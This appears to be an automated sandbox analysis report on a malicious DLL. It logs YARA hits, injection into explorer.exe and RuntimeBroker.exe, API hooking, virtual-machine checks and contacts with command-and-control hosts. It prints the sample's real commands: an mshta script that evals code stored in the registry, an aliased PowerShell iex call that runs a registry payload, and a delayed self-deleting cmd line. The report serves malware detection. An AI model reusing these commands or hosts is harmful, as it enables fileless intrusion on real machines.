Source: Yara match File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
Source: Yara match File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll (observed twice)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF80250521C
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF802505200
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (7 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (81 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (11 occurrences)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: RuntimeBroker.exe, 0000002D.00000000.502166854.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513265661.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495786789.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.526561852.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.490570180.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.507573940.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532262658.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLL5
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808 Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6733
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2704
                      Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
                      Source: explorer.exe, 0000001B.00000000.408453384.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                      Source: RuntimeBroker.exe, 00000031.00000000.538603337.0000018280A54000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 2E09.bin.27.dr Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
                      Source: 2E09.bin.27.dr Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
                      Source: 2E09.bin.27.dr Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: 2E09.bin.27.dr Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: 2E09.bin.27.dr Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
                      Source: mshta.exe, 00000013.00000002.342969322.00000162CE011000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 2E09.bin1.48.dr, 2E09.bin.27.dr Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002D.00000000.507758371.000001FFC2056000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
                      Source: explorer.exe, 0000001B.00000000.410736983.0000000005138000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06278FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.189.151.28 80
                      Source: C:\Windows\explorer.exe Domain query: gamexperts.net
                      Source: C:\Windows\explorer.exe Domain query: cabrioxmdes.at
                      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 2740000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 15723670000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exe Thread created: unknown EIP: 2BC1580
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 5D0000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 360000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2760000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 35E000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2740000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 15723670000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 418792000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 491CC81000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3616 base: 360000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3616 base: 2760000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\System32\control.exe Memory written: PID: 3616 base: 35E000 value: 00
                      Source: C:\Windows\System32\control.exe Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exe Memory written: PID: 3616 base: 2740000 value: 80
                      Source: C:\Windows\System32\control.exe Memory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 7000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3616
                      Source: C:\Windows\System32\control.exe Thread register set: target process: 3616
                      Source: C:\Windows\System32\control.exe Thread register set: target process: 5180
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4440
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4724
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4960
                      Source: C:\Windows\explorer.exe Thread register set: target process: 3700
                      Source: C:\Windows\explorer.exe Thread register set: target process: 6604
                      Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                      Source: explorer.exe, 0000001B.00000000.442375822.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.410845444.0000000005E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.424824730.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager,
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D3365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
